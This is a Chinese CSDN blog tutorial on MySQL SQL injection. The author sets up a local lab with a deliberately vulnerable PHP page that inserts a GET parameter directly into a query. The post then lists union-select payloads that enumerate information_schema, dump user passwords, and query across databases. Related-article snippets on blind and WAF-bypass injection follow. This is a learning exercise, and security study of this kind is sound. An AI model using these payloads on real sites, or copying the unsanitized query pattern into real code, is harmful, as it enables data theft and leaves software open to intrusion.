sql注入漏洞--MYSQL两种思路

于 2023-12-01 11:36:38 发布
阅读量1.4k 收藏 15
点赞数 22
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75317918/article/details/134706933
版权

在学习之前,先自己搭建了一个网站

在前端可以实现与后端数据库的交互查询

创建一个数据库名为wy,表名为users

建立字段,定义类型 

  插入数据

INSERT INTO `users`(`name`, `password`,`photo`, `money`) VALUES ("DuZZ",123456,11,100);
INSERT INTO `users`( `name`, `password`, `photo`, `money`) VALUES ("GuQQ",654321,22,100);

确认

index.php

<?php
$dbHost = "127.0.0.1";  //数据库地址
$dbUser = "root"; //登录数据库的用户名
$dbPass = "root";//登录数据库的密码
$dbName = "wy";//数据库的名称   
$link = @new mysqli($dbHost, $dbUser, $dbPass, $dbName); //建立数据库
if ($link->connect_error) 
{
    echo $mysqli->connect_error; 捕获数据库连接时的错误信息
}
if (isset($_GET['param'])) // 检查是否有传递的参数
{
    $param = $_GET['param'];
    $sql = "SELECT * FROM users WHERE id = '$param'";// 使用参数构建查询语句
} 
else 
{ 
    $sql = "SELECT * FROM users";// 默认查询语句
}

if ($results = mysqli_query($link, $sql)) //mysqli_query函数执行失败时返回 false,通过mysqli_query() 成功执行SELECT, SHOW, DESCRIBE或 EXPLAIN查询会返回一个mysqli_result 对象,其他查询则返回true。
{
    while ($result = mysqli_fetch_assoc($results)) //使用mysqli_fetch_assoc函数获取返回对象中的具体数据。
    {
        var_dump($result);  //输出每一行的数据
        echo "<hr/>";  //在输出之间添加<hr/>标签,以在结果之间添加水平分隔线。
    }
} 
else 
{
    die(mysqli_error($link)); //捕获SQL语句的错误,并结束脚本运行
}
$link->close();
?>

  访问一下

通过get传参查询

相关函数:

 

sql注入漏洞

脚本代码在实现代码与数据库进行数据通讯时(从数据库取出相关数据进行页面显示),将定义的sql语句进行执行查询数据时。其中的SQL语句能通过参数传递自定义值来实现控制SQL语句,从而执行恶意的SQL语句,可以实现查询其他数据(数据库中的敏感数据,如管理员帐号密码)

$i=$_GET[id];//GET请求接受id参数名值给变i

$sql="select * from sy_guestbook where id=$i";

//?id=1 
//select *from sy_guestbook where id=1

//id=1 and
//select *from sy_guestbook where id=1 and

MYSQL 统一管理
最高数据库用户=root用户
数据库A-->网站A-->数据库用户A
  表名
      列
        数据
数据库B-->网站B-->数据库用户B
数据库C-->网站C-->数据库用户C


为了网站和数据库的安全性,mysql内置有ROOT最高用户,划分等级,每个用户对应管理一个数据库,这样保证无不关联,从而不会影响到其他数据库的运行。

MYSQL两种思路


1、非ROOT的注入攻击: 常规类的猜解

2、ROOT用户的注入攻击: 文件读写操作,跨库查询注入等 

MYSQL5.0以上版本:自带的数据库名information_schema
information_schema: 存储数据库下的数据库名及表名,列名信息的数据库

information_schema.tables:记录表名信息的表

information_schema.columns: 记录列名信息表

获取相关数据:


数据库版本-看是否符合information schema查询

-version()-5.7.26

数据库用户-看是否符合ROOT型注入攻击

-user()-root@localhost

当前操作系统-看是否支持大小写或文件路径选择

-@@version_compile_os-win64

数据库名字-为后期猜解指定数据库下的表,列做准备

-database()-wy

ROOT类型攻击-猜解数据,文件读写,跨库查询

获取wy数据库下面的表名信息: 

?param=-1' union select 1,2,3,4,table_name from information_schema.tables where table_schema='wy' --+

获取表名wy的列名信息: 

?param=-1' union select 1,2,3,4,column_name from information_schema.columns where table_name='users' and table_schema='wy'--+

获取指定数据:

?param=-1' union select 1,2,3,4,password from wy.users --+

跨库注入

就是如果你是root用户,根据上面的假设,我是在wy这个数据库中进行查询的,但是如果我想要在其他的库中进行查询,那么我们就先在information_schema.schemata这个表中查询其他的库(下文为security),然后指定想要查询的库进行查询

获取当前MySQL 下的所有数据库名

?param=-1' union select 1,2,3,4,schema_name from information_schema.schemata --+

获取数据库名为security下的表名信息

?param=-1' union select 1,2,3,4,table_name from information_schema.tables where table_schema='security' --+

获取表名为users的列名信息

?param=-1' union select 1,2,3,4,column_name from information_schema.columns where table_schema='security' and table_name='users' --+

获取指定数据

?param=-1' union select 1,2,3,4,password from security.users --+

木…
关注
  • 22
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Mysql注入拖库_分享一篇使用SQL注入漏洞拖库的实例讲解
weixin_30002803的博客
01-28 215
利用SQL注入漏洞登录后台和利用SQL注入漏洞拖库是我学习了相关内容之后的一点小结,没啥深度。同上一篇文章一样,我们需要创建数据表,并在表中出入几条数据以备测试之用。在数据库中建立一张表:代码如下:CREATE TABLE `article` (`articleid` int(11) NOTNULLAUTO_INCREMENT,`title` varchar(100) CHARACTERSETut...
mysql注入之盲注语句汇总
sirius的博客
08-28 3679
目录 mysql注入之盲注 常用语句汇总 基于bool盲注 查询当前数据库 基于时间的盲注 盲注常用函数: regexp正则注入 like匹配注入 特殊的盲注之报错注入 mysql注入之盲注 什么是盲注? 基于布尔型SQL盲注即在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)。 盲注就是利用真假条件进行测试。 这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息。 常用语句汇总 基.
sql注入information_schema代替,无列名注入之[SWPU2019]Web11
qq_58970968的博客
08-10 899
的时候,有时候information_schema这个库可能会因为过滤而无法调用,这时我们就不能通过这个库来查出表名和列名。但是上述两种方法都只能查出表名,无法查到列名,这时我们就要用到无列名注入了。无列名注入,顾名思义,就是不需要列名就能注出数据的注入。但是mysql.innodb_table_stats只查到表名,所以不知道列名;information_schema可以查到所有的数据库和表名和列名;当or 被过滤时不能使用information_schema;这道题过滤了空格,用/**/绕过;...
注入之mysql数据库(手工注入)
2301_79194110的博客
09-15 299
MySQL 4版本数据库由于存在着字符转义与不支持字句查询的情况,因此在注入攻击上存在着很大的局限性,只能采用类似Access的方法进行查询猜解。首先,利用order by获得当前表的字段数,再使用union select联合查询来获取想要的数据库信息。使用union select联合查询数据库时,由于不知道数据库中的表名与字段名,因此只能像Access一样直接用常见表名和字段名进行猜测判断。MySQL 5版本由于information_schema库的存在,注入攻击相对来说方便了许多。
查询数据库中所有列名
xianrenyingzi的专栏
12-14 4713
如何从整个数据库所有表中查找出一个列名?比如想要查找一个名为"name"的列名,但是忘记了这一列是在那一个表中,需要从整个数据库的所有表中进行查询。 Oracle 数据库: select * from user_col_comments s where s.column_name like 'NAME%'; MySQL数据库: SELECT * FROM information_schema.COLUMNS WHERE column_name like 'NAME%'; SqlServer数据库:
MySQL 面试题-SQL注入篇.docx
09-17
4. SQL注入漏洞的修复: - 输入验证增强:自定义验证规则,限制非法字符,确保输入的安全性。 - 使用参数化查询和预编译语句:这是最有效的防止SQL注入的技术,因为它将数据与SQL语句结构分离。 - 部署Web应用...
计算机-mysql-模型驱动的web应用SQL注入安全漏洞渗透测试研究.pdf
07-08
SQL注入漏洞与模型驱动的渗透测试】 在当前互联网环境中,Web应用程序扮演着至关重要的角色,涉及各种在线交易。然而,这些应用程序中的安全漏洞成为网络安全的重大威胁。许多Web应用程序存在危害其安全性的漏洞...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMap:SQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
第一节 SQL注入的原理-01
09-15
如果页面中Mysql报错,证明该页面存在SQL注入漏洞。 Sqlmap基本使用 Sqlmap是检测和利用SQL注入漏洞的一款强大工具。可以用来检测Web应用程序中的SQL注入漏洞,并提供自动化的攻击功能。例如,使用Sqlmap可以自动...
SQL注入思路详解
12-14
SQL注入是一种常见的网络安全威胁,它利用了Web应用程序在处理用户输入数据时的不足,使得攻击者能够构造恶意的SQL语句来控制或篡改数据库。本文将深入解析SQL注入思路,帮助你理解和防范这种攻击。 首先,SQL...
mysql漏洞注入
最新发布
m0_73756016的博客
10-11 118
创建数据表#查看数据表信息#查看数据列表#删除数据表#修改数据表名为b#写入内容#增加一列内容update a set salary=5000#修改所有工资为5000#修改id=1行的name为benben,salary为3#删除列#删除行。
SQL注入系列之PHP+Mysql手动注入(一)----数字型
热门推荐
fendo
01-01 1万+
常见的几种SQL注入 1.数字型 2.字符型 3.文本型 4.搜索型(POST/GET) 5.cookie注入 6.SQL盲注 MySQL报错注入基本流程: Mysql注入步骤 1.判断sql注入 2.猜解表名 3.猜解列名 4.猜解字段内容 5.导出webshell 1.判断sql注入 ○提交单引号' ○and大法和or大法
Mysql注入 -- 延时注入
weixin_41489908的博客
05-16 2814
生活不止眼前的苟且,还有房费、饭费、水电费。。。 ----网易云热评 一、常用函数 1、sleep(5):延时5秒 2、if(a,b,c):a为条件,正确返回b,否则返回c 二、实例测试 1、找到可以注入的payload,服务器反映5秒才有相应 http://192.168.139.129/sqli/Less-9/?id=1' and sleep(5) --+ 2、获取数据库长度,如果数据库名的长度等于8停留5秒 http://192.168.139.129/sqli/..
mysql盲注if半段_Mysql手工盲注小结
weixin_42636454的博客
02-03 317
布尔型盲注原理:在SQL注入过程中,应用程序仅仅返回True(页面)和False(页面)这时,我们无法根据应用程序的返回页面得到我们需要的数据库信息。但是可以通过构造逻辑判断(比较大小)来得到我们需要的信息MySQL盲注常用函数:length() #返回字符串的长度,例如可以返回数据库名字的长度substr() #用来截取字符串ascii() #返回字符的ascii码sleep(n) #将程序挂起...
mysql时间盲注if的绕过_WAF机制及绕过方法总结:注入篇
weixin_35728286的博客
02-02 1495
任务目标1.收集网络上各种sql注入时使用的payload并理解其适用的环境(检测注入、利用注入);2.记录sqlmap的检测和利用过程中使用的payload;3.理解以上涉及的sql语句的意思,其中会涉及不同的数据库、不同注入场景。将收集方式和学习过程整理形成报告;4.扩展学习:理解sqlmap自带tamper的原理0x01 Payload收集以下payloads都基于单引号字符型注入。若是整型...
MySQL注入及绕过备忘录
weixin_43610673的博客
04-25 5131
SQL注入(以Mysql为例) 大致分为有回显和无回显两类进行梳理,重心会放在盲注这一块,正则匹配等一些技巧都放在盲注部分。 使用sql-labs进行演示,在challenges数据库中在添加一个flag数据库表,并修改sql-labs源码使其回显执行的sql语句,方便演示。 判断是否存在SQL注入 本质都是看页面是否出现异常 加单引号’、双引号”、单括号)、双括号))或者进行组合看看是否报错(字符型)。 服务器不返回报错信息时,加 and 1=1 、 and 1=2 看页面是否有变化(数字型),字符型
mysql 盲注 if_load_file进行mysql盲注+mysql的一些tip
weixin_31668621的博客
02-02 274
1、前言今天看了一道安恒杯的ctf题,里面load_file盲注的思路看起来有点意思,该思路没有用单引号,使用到sql查询文件内容。1.mysqld启动1.在利用mysql进行sql注入的测试中,遇到一些mysql启动上的问题,可以在mysql的启动或控制台日志查看输入命令mysqld --console2.其次是有时候不存在端口占用又无法启动mysqld的情况,需要进入services中将mys...
mysql 盲注 if_Mysql 另类盲注中的一些技巧
weixin_29982199的博客
02-02 173
转:oldjun.com—————————————————————————-很多技巧从国外的paper学到的,不过国内没有多少人使用,所以发出来,笔记下~一、order by 的参数注入技巧:两种方法,思路都一样。example. “select username,password from uc_members order by”.$_GET['oderby']a.常见的利用方法:1.[SQL]...
Mysql注入总结
hykjtt的专栏
03-06 667
1、MYSQL注入原理:用户输入的内容被当作sql语句来执行2、MYSQL注入实战心得:一试参数,二试类型,三试绕过一试参数:任何注入参数,都需确定其类型(数字还是字符),此处指的是注入参数的类型(***)  常用测试字符:引号(单双),圆括号,引号加圆括号......二试类型:五大类(BEUST):布尔型盲注、报错型注入、UNION联合查询型注入、时间延迟型盲注、堆查询注入  布尔型盲注:and...
MySQL注入实战指南——Sqli-labs教程解析
"MySQL注入天书——Sqli-labs使用手册" 这篇文档是关于MySQL注入技术的详细指南,特别关注于使用Sqli-labs进行实战...通过Sqli-labs的实践,读者可以增强对SQL注入漏洞的识别和防御能力,同时提升对数据库安全的理解。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值